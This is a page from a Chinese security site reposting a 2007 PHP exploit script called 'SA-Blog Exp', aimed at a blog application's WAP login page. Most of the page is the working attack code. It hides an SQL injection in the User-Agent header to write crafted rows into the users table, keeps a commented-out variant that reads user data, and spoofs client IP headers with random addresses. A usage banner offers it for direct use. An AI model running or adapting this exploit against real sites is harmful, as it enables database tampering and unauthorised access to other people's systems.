首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SA-Blog Exp
来源:loveshell.net 作者:vfocus 发布时间:2007-09-17  
<?php
//from    loveshell.net
$url    =    $argv[1].'/wap/index.php';
$username    =    $argv[2];
$password    =    $argv[3];


echo"    +----------------------------------------------------------------+";
echo"        Uage:    php.exe    blogurl    username    password";
echo"        example    php.exe    http://www.loveshell.net/blog    test    test";
echo"    +----------------------------------------------------------------+";


if(!$username||!$password)    die;

echo"    root@localhost:Post    our    content";

$str    =    'username='.$username.'&password='.$password.'&action=login&do=login&';

$msg    =    myrequest($str,$url);
echo    $msg;

if(strpos($msg,'登陆成功')!==false)    echo"    root@localhost:All    Done!!!    ";
else    echo"    root@localhost:Login    error!!!    ";
echo"    +----------------------------------------------------------------+";
echo"    Enjoy    yourself.";
echo"    +----------------------------------------------------------------+";


function    myrequest($msg,$url,$type=2,$cookie=''){
//change    type    for    post/get
    global    $sql;
$urls    =    initurl($url);
$iprand    =    rand(1,255).'.'.rand(1,255).'.'.rand(1,255).'.'.rand(1,255);
$fp    =    @fsockopen($urls['host'],    $urls['port'],    $errno,    $errstr,    3);
    if($fp)    {
        if($type==1){
        fputs($fp,    "GET    $urls[path]?$urls[query]    HTTP/1.1");
        fputs($fp,    "Host:    $urls[host]");
        fputs($fp,    "Accept:    */*");
        fputs($fp,    "Referer:    $urls[url]");
        fputs($fp,    "User-Agent:    Mozilla/4.0    (compatible;    MSIE    5.00;    Windows    98)");
        fputs($fp,    "CLIENT_IP:    $iprand");
        fputs($fp,    "X_FORWARDED-FOR:    $iprand");
        fputs($fp,    "Pragma:    no-cache");
        fputs($fp,    "Cache-Control:    no-cache");
        fputs($fp,    "Connection:    Keep-Alive");
        fputs($fp,    "Cookie:    $cookie");
        }else{
        fputs($fp,    "POST    $urls[path]?$urls[query]    HTTP/1.1");
        fputs($fp,    "Accept:    application/x-shockwave-flash,    image/gif,    image/x-xbitmap,    image/jpeg,    image/pjpeg,    */*");
        fputs($fp,    "Referer:    $urls[url]");
        fputs($fp,    "Accept-Language:    zh-cn");
        fputs($fp,    "Content-Type:    application/x-www-form-urlencoded");
//        fputs($fp,    "User-Agent:    ',1),((select    concat(0x2f,groupid,0x2f,logincount)    from    angel_users    limit    1),1,1,'211.43.206.208','123");
        fputs($fp,    "User-Agent:    ',1),('9c5b71e5',1,1,'211.43.206.202','9989581653");
        fputs($fp,    "CLIENT_IP:    $iprand");
        fputs($fp,    "X_FORWARDED-FOR:    $iprand");
        fputs($fp,    "Host:    $urls[host]");
        fputs($fp,    "Content-Length:    ".strlen($msg)."");
        fputs($fp,    "Connection:    Keep-Alive");
        fputs($fp,    "Cache-Control:    no-cache");
        fputs($fp,    "Cookie:    $cookie");
        fputs($fp,    $msg."");
        }
    }


while($fp&&!feof($fp))    {
$resp    .=    fread($fp,1024);
}
return    $resp;
}


function    initurl($url)    {

$newurl    =    '';
$blanks    =    array('url'=>'');
$urls    =    $blanks;


if(strlen($url)<10)    return    $blanks;
$urls    =    @parse_url($url);
if(empty($urls)    ||    !is_array($urls))    return    $blanks;
if(empty($urls['scheme']))    return    $blanks;
if($urls['scheme']    ==    'file')    return    $blanks;

$newurl    .=    $urls['scheme'].'://';
$newurl    .=    empty($urls['user'])?'':$urls['user'];
$newurl    .=    empty($urls['pass'])?'':':'.$urls['pass'];
$newurl    .=    empty($urls['host'])?'':((!empty($urls['user'])    ||    !empty($urls['pass']))?'@':'').$urls['host'];
$newurl    .=    empty($urls['port'])?'':':'.$urls['port'];
$newurl    .=    empty($urls['path'])?'':$urls['path'];
$newurl    .=    empty($urls['query'])?'':'?'.$urls['query'];
$newurl    .=    empty($urls['fragment'])?'':'#'.$urls['fragment'];

$urls['port']    =    empty($urls['port'])?'80':$urls['port'];
$urls['url']    =    $newurl;


return    $urls;
}
?>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·JetCast Server 2.0.0.4308 Remo
·Gelato (index.php post) Remote
·Mozilla Firefox + QuickTime Co
·KwsPHP 1.0 (login.php) Remote
·Microsoft SQL Server Distribut
·KwsPHP 1.0 Member_Space Module
·Wordpress Multiple Versions Pw
·KwsPHP 1.0 stats Module Remote
·Microsoft Visual Studio 6.0 (V
·Omnistar Article Manager Softw
·Microsoft Visual Studio 6.0 (P
·Shop-Script FREE <= 2.0 Remote
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved